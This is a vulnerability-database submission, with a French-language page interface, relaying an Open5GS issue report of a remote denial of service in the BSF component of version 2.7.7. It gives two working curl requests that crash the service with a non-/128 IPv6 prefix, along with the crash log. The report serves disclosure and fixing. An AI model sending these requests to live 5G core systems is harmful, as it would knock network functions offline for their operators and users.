Soumettre #804322: Open5gs BSF v2.7.7 Denial of Serviceinformation

TitreOpen5gs BSF v2.7.7 Denial of Service
Description### Open5GS Release, Revision, or Tag v2.7.7 ### Description BSF crashes when `ipv6Prefix` input reaches `bsf_sess_find_by_ipv6prefix()` with a valid IPv6 prefix whose length is not `/128`. The helper contains: ```c ogs_assert(ipv6prefix.len == OGS_IPV6_128_PREFIX_LEN); ``` and it is reachable from both: - `GET /nbsf-management/v1/pcfBindings?ipv6Prefix=...` - `POST /nbsf-management/v1/pcfBindings` when the request body contains `ipv6Prefix` This makes malformed but syntactically valid non-/128 IPv6 prefixes a remote DoS condition. ### Steps to reproduce Variant 1, query parameter: ```bash curl --http2-prior-knowledge -m 5 -sS -i \ 'http://10.33.33.5/nbsf-management/v1/pcfBindings?ipv6Prefix=2001:db8::1/64' ``` Variant 2, request body: ```bash curl --http2-prior-knowledge -m 5 -sS -i \ -X POST http://10.33.33.5/nbsf-management/v1/pcfBindings \ -H 'content-type: application/json' \ --data '{"ipv6Prefix":"2001:db8::1/64","dnn":"internet","snssai":{"sst":1,"sd":"000001"},"pcfFqdn":"pcf.example"}' ``` After sending either request, check the BSF container state and logs: ```bash docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' bsf docker logs --since 2026-04-10T16:54:49Z bsf ``` ### Logs ```text 04/10 16:54:49.683: [bsf] FATAL: bsf_sess_find_by_ipv6prefix: Assertion `ipv6prefix.len == OGS_IPV6_128_PREFIX_LEN' failed. (../src/bsf/context.c:346) ``` ### Expected behaviour BSF should reject invalid or unsupported IPv6 prefix lengths with a normal HTTP error response and remain running. ### Observed Behaviour The connection is reset and the BSF process exits with code `139`. ### eNodeB/gNodeB Not required. ### UE Models and versions Not required.
La source⚠️ https://github.com/open5gs/open5gs/issues/4401
Utilisateur
 ZiyuLin (UID 93568)
Soumission14/04/2026 11:36 (il y a 2 mois)
Modérer01/05/2026 09:03 (17 days later)
StatutAccepté
Entrée VulDB360530 [Open5GS jusqu’à 2.7.7 BSF /src/bsf/context.c bsf_sess_find_by_ipv6prefix ipv6Prefix déni de service]
Points20

PrécédentAperçuSuivant

Want to stay up to date on a daily basis?

Enable the mail alert feature now!